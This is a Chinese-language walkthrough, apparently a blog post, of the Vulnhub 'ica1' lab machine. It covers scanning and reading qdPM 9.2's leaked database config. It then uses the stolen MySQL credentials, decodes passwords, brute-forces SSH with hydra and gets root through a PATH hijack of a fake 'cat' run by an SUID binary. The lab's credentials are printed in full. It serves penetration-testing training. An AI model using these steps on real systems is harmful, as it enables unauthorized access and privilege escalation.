ica1

我们还是使用 kali 中的 arp-scan -l 查询靶机 ip

靶机 ip:192.168.75.129

第一步 信息收集

复制代码
nmap -sS 192.168.75.129

访问网站

这个是一个web应用,框架是qdpm 9.2

在kali上搜索一下发现有两个漏洞,依次看一下

复制代码
searchsploit qdpm 9.2

1.locate 50854.txt

复制代码
cat /usr/share/exploitdb/exploits/php/webapps/50854.txt

这个是一个csrf的html文件

2.50176.txt

数据库的密码和连接字符串存储在yml文件中。

复制代码
访问地址:/core/config/databases.ym

第二步 漏洞利用

访问地址后下载下来一个文件

复制代码
进行连接数据库,用户名qdpmadmin;密码:UcVQCMQk2STVeS6J

我们去连接数据库

复制代码
mysql -u qdpmadmin -h 192.168.47.135 -p 

在staff这个数据库有三张表

复制代码
#user表中都是用户名
Smith
ucas
Travis
Dexter
Meyer 

#login表中都是base64加密
c3VSSkFkR3dMcDhkeTNyRg==
N1p3VjRxdGc0MmNtVVhHWA==
WDdNUWtQM1cyOWZld0hkQw==
REpjZVZ5OThXMjhZN3dMZw==
Y3FObkJXQ0J5UzJEdUpTeQ== 
#解密
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy

爆破一下靶机的ssh

user和passwd做成一个文件

复制代码
hydra -L user -P passwd ssh://192.168.47.135

在这里用户名首字母都是大写;我们要给他换成小写;要不会爆不出来

使用ssh去连接;获取flag

第三步 提权

切换用户dexter

查看了一下note.txt

文件给了提示需要suid提权

复制代码
#查找具有SetUID权限的文件的命令
find / -perm -4000 2>/dev/null

使用strings命令查看一下get_access

发现cat命令提权

配置环境变量

复制代码
echo "/bin/bash" > /tmp/cat
export PATH=/tmp:$PATH
chmod +x /tmp/cat
ehco $PATH
/opt/get_access
相关推荐
H轨迹H4 天前
Vulnhub-venom
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
H轨迹H6 天前
Vulnhub-sundown
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
H轨迹H6 天前
Vulnhub-Source-1(CVE-2019-15107)
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
H轨迹H8 天前
Vulnhub-election靶机
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
H轨迹H9 天前
Vulnhub-Hackme
网络安全·渗透测试·vulnhub·信息收集·web漏洞·oscp
H轨迹H10 天前
Vulnhub-FristiLeaks_1.3
网络安全·渗透测试·vulnhub·信息收集·web漏洞·oscp
H轨迹H14 天前
Vulnhub-Zico2靶机-漏扫弱口令数据库+文件包含反弹shell+zip,tar提权
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
H轨迹H17 天前
Vulnhub-Troll-1靶机-ftp匿名登录+流量包分析+hydra爆破+ssh登录脚本提权
网络安全·渗透测试·vulnhub·ctf·信息收集·web漏洞·oscp
H轨迹H18 天前
Vulnhub-DC-9靶机-SQL注入拿到账户+利用端口敲门连接ssh+信息泄露利用root脚本追加提权
网络安全·渗透测试·vulnhub·ctf·靶机·oscp
尘佑不尘18 天前
【无标题】oscp备考,oscp系列——Tr0ll1靶场,两种提权方式,ftp匿名登录,ssh爆破,ubuntu内核提权,计划任务
web安全·ubuntu·渗透测试·ssh·vulnhub